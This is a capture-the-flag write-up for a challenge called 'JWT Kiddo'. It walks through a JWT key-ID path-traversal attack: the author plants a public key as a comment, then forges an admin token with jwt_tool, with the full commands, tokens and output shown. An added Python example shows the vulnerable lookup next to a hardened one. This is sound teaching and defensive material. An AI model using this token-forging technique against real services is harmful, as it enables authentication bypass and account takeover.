JWT Kiddo


We start by generating our own RSA key pair:

openssl genpkey -algorithm RSA -out private.key
openssl rsa -pubout -in private.key -out public.key

We then post a comment containing only our public key, so that the comment gets stored under ../data/<comment-id>. Since key-0.pem lives in public/keys, the final kid will be:

kid: public/keys/../data/6776d969-7a44-423a-8771-1e8f786c6e31
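The bug this writeup exploits is a kid that is joined onto the key directory without validation. The following is an added example (not the challenge's code) of what a verifier should do instead: an allowlist on the kid's shape plus a containment check on the resolved path. The directory public/keys, the key-N.pem naming convention and the function names are assumptions.

```python
# Added example: safe `kid` -> key-file lookup for a JWT verifier that keeps keys on disk.
# KEYS_DIR and KID_PATTERN are assumptions chosen to match the layout seen in the writeup.
import os
import re
from pathlib import Path
from typing import Optional

KEYS_DIR = Path("public/keys")               # assumed key directory
KID_PATTERN = re.compile(r"^key-\d+\.pem$")  # assumed naming convention: key-0.pem, key-1.pem, ...


def vulnerable_key_path(kid: str) -> str:
    """The pattern the writeup abuses: kid joined straight onto the key directory.
    A kid containing '..' resolves to a file outside public/keys."""
    return os.path.normpath(os.path.join("public/keys", kid))


def escapes_keys_dir(kid: str, keys_dir: Path = KEYS_DIR) -> bool:
    """Containment check: True when kid would resolve outside keys_dir.
    Also usable on its own as a detection rule over incoming token headers."""
    base = keys_dir.resolve()
    candidate = (base / kid).resolve()  # an absolute kid replaces base here, so it is caught too
    try:
        candidate.relative_to(base)
    except ValueError:
        return True
    return False


def safe_key_path(kid: str, keys_dir: Path = KEYS_DIR) -> Optional[Path]:
    """Return the key file for kid, or None when the token must be rejected.
    Check 1: strict allowlist on the kid's shape (no '/', no '..', no absolute path).
    Check 2: resolved path must stay inside keys_dir (defense in depth, in case
    the allowlist is ever relaxed)."""
    if not KID_PATTERN.fullmatch(kid):
        return None
    if escapes_keys_dir(kid, keys_dir):
        return None
    return (keys_dir.resolve() / kid)
```

The key file is looked up, never written, so even a rejected kid has no side effect; a None result should map to a 401 and a log line carrying the raw kid.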

Next, we change the user and kid values with jwt_tool:

$ python3 jwt_tool.py eyJhbGciOiJSUzI1NiIsImtpZCI6ImtleS0wLnBlbSIsInR5cCI6IkpXVCJ9.eyJ1c2VyIjoiZ3Vlc3QtMTQ5YjJjNDMifQ.MPDSZqno2k0pnVoZNWgao0IVcKYLMAh8TbRsWW4K4m3MS9QNh3tyqQKwwD8KLMkeoVxL8SAF-r4FxrnGeVYa2_f66dGDkNi_R3L-Hccv4BruBAtTNfo7rUY9jOXLdODKg7_-s6v3zaLcXKGndbu-MVh56g5MDyDYMIGCdVfIeSvdas4kUx7Y0oKK0rfTCpbl-IaYpkW93NnH0ic2YSEw8BxImPD_mXXOGDGCOc6LhbajnHVQBD_R7S6PQcatSYg4cEYpB56_PwZIcm_x5fIc2jL4pDYppUXjOIgnScbHOwHMaG8H2ZJYgcBdBeu6fuIMG5BbQDt6ANAPyPrXXu0bOA \
    -hv kid -hv "../data/6776d969-7a44-423a-8771-1e8f786c6e31" -pv user -pv "admin" -S rs256 -pr private.key -T
Original JWT:

Token header values:
[1] alg = "RS256"
[2] kid = "key-0.pem"
[3] typ = "JWT"

Current value of kid is: key-0.pem
Please enter new value and hit ENTER
> ../data/6776d969-7a44-423a-8771-1e8f786c6e31

[1] alg = "RS256"
[2] kid = "../data/6776d969-7a44-423a-8771-1e8f786c6e31"
[3] typ = "JWT"

Token payload values:
[1] user = "guest-149b2c43"

Current value of user is: guest-149b2c43
Please enter new value and hit ENTER
> admin
[1] user = "admin"

jwttool_b6c328ca6fd83bf8813d53148ca0f755 - Tampered token - RSA Signing:
[+] eyJhbGciOiJSUzI1NiIsImtpZCI6Ii4uL2RhdGEvNjc3NmQ5NjktN2E0NC00MjNhLTg3NzEtMWU4Zjc4NmM2ZTMxIiwidHlwIjoiSldUIn0.eyJ1c2VyIjoiYWRtaW4ifQ.YeopvZJGHjAl0LX-G0hvE0zj0SPQvkvjJmaDeG93x8820MqNEwU6T0mMz3HJBQ3IcAwz5Z75B-Af1rb7CXoaV_VtGuuJdydlHiWOjzbqcY0nLEzEIDwkgifXx5CvcZiOVxMNWfDFs6TaP1X2z5_lnpONd9sqrx56d9NaeI5FfxlzUYBQXyHIkNZmpzZVzpcTvVenTS1O-t4PLPvxa-W7_DKMQVedCVLOdu4JB9yhMlIW6uSZxuGJcv62BBM78KF8mzAYWMPcELdsvxgjtnqdPILawWmdjYOoZMqSPwOAKnj88zFBaUSdfcW6dgiNvFQNYkhbhAlLHfhfcLwbW2rbQQ

We then verify our JWT against our public key to make sure the signature is valid:

$ python3 jwt_tool.py -S rs256 -pk public.key -v eyJhbGciOiJSUzI1NiIsImtpZCI6Ii4uL2RhdGEvNjc3NmQ5NjktN2E0NC00MjNhLTg3NzEtMWU4Zjc4NmM2ZTMxIiwidHlwIjoiSldUIn0.eyJ1c2VyIjoiYWRtaW4ifQ.YeopvZJGHjAl0LX-G0hvE0zj0SPQvkvjJmaDeG93x8820MqNEwU6T0mMz3HJBQ3IcAwz5Z75B-Af1rb7CXoaV_VtGuuJdydlHiWOjzbqcY0nLEzEIDwkgifXx5CvcZiOVxMNWfDFs6TaP1X2z5_lnpONd9sqrx56d9NaeI5FfxlzUYBQXyHIkNZmpzZVzpcTvVenTS1O-t4PLPvxa-W7_DKMQVedCVLOdu4JB9yhMlIW6uSZxuGJcv62BBM78KF8mzAYWMPcELdsvxgjtnqdPILawWmdjYOoZMqSPwOAKnj88zFBaUSdfcW6dgiNvFQNYkhbhAlLHfhfcLwbW2rbQQ
Original JWT:

Token: {"alg":"RS256","kid":"../data/6776d969-7a44-423a-8771-1e8f786c6e31","typ":"JWT"}.{"user":"admin"}.YeopvZJGHjAl0LX-G0hvE0zj0SPQvkvjJmaDeG93x8820MqNEwU6T0mMz3HJBQ3IcAwz5Z75B-Af1rb7CXoaV_VtGuuJdydlHiWOjzbqcY0nLEzEIDwkgifXx5CvcZiOVxMNWfDFs6TaP1X2z5_lnpONd9sqrx56d9NaeI5FfxlzUYBQXyHIkNZmpzZVzpcTvVenTS1O-t4PLPvxa-W7_DKMQVedCVLOdu4JB9yhMlIW6uSZxuGJcv62BBM78KF8mzAYWMPcELdsvxgjtnqdPILawWmdjYOoZMqSPwOAKnj88zFBaUSdfcW6dgiNvFQNYkhbhAlLHfhfcLwbW2rbQQ

Token header values:
[+] alg = "RS256"
[+] kid = "../data/6776d969-7a44-423a-8771-1e8f786c6e31"
[+] typ = "JWT"

Token payload values:
[+] user = "admin"

Finally, we send a GET to api/flag with the new JWT.

Flag: CYBN{h4ck3r_2_h4ck3r5}